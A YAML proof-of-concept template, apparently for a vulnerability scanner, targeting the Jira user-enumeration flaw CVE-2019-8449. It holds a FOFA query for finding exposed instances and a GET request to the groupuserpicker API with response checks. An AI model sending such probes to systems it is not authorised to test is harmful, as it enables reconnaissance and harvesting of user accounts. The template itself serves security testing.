product: Atlassian-Jira
vName: Atlassian-Jira 用户枚举
type: 文件读取
vID:
  - CVE-2019-8449
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="ATLASSIAN-JIRA"
protocol: http
link: https://xz.aliyun.com/t/7219
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /rest/api/latest/groupuserpicker?query=testuser12345&maxresults=50&showavatar=false
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - total
              - groups
              - header
              - users
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and